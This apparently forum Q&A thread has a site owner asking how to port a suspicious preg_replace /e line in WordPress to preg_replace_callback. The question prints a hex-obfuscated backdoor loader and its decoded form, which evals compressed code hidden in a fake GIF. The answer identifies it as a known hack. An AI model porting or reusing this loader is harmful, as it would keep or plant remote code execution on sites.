Wordpress update preg_replace to preg_replace_callback

Question

I'm updating my website's PHP and when I try to update it to the most recent PHP version I get this message:

Warning: preg_replace(): The /e modifier is no longer supported, use preg_replace_callback instead in /home/customer/www/---.org/public_html/wp-includes/init.php on line 291

Here's the line I want to change:

preg_replace("/.*/e","\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a\x20\x3d\x20\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x22\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x73\x6d\x69\x6c\x69\x65\x73\x2f\x69\x63\x6f\x6e\x5f\x77\x74\x66\x2e\x67\x69\x66\x22\x29\x3b\x65\x76\x61\x6c\x28\x40\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x24\x70\x61\x67\x65\x78\x79\x7a\x29\x29\x3b\x27\x29\x3b","");

I need to change it to preg_replace_callback but I'm confused by this part:

\x65\x76\x61\x6c\x28\x27\x24\x70\x61\x67\x65\x78\x79\x7a\x20\x3d\x20\x40\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73\x28\x22\x77\x70\x2d\x69\x6e\x63\x6c\x75\x64\x65\x73\x2f\x69\x6d\x61\x67\x65\x73\x2f\x73\x6d\x69\x6c\x69\x65\x73\x2f\x69\x63\x6f\x6e\x5f\x77\x74\x66\x2e\x67\x69\x66\x22\x29\x3b\x65\x76\x61\x6c\x28\x40\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65\x28\x24\x70\x61\x67\x65\x78\x79\x7a\x29\x29\x3b\x27\x29\x3b

How do I translate that part?

When I use an online decoder it looks like this:

eval('$pagexyz = @file_get_contents("wp-includes/images/smilies/icon_wtf.gif");eval(@gzinflate($pagexyz));');

Answer 1

I've not looked to deeply into this but, are you supposed to have a wp-includes/init.php file?

Official repo shows no such file for the latest version

A quick google suggests this is the result of a hack, search "wp-includes/init.php"

Also examining the code i see "wp-includes/images/smilies/icon_wtf.gif" why would what the f*** .gif be in the core? And the encoded function here smells very fishy.

Post about the potential hack https://blog.tonyballantyne.com/2017/01/25/wordpress-pharma-hack/

You shouldnt need to edit anything inside wp-includes/ as its a core folder. It would make sense to install a Core integrity checking plugin and maybe update to the latest version, you cant guarantee the database hasn't already been tampered with.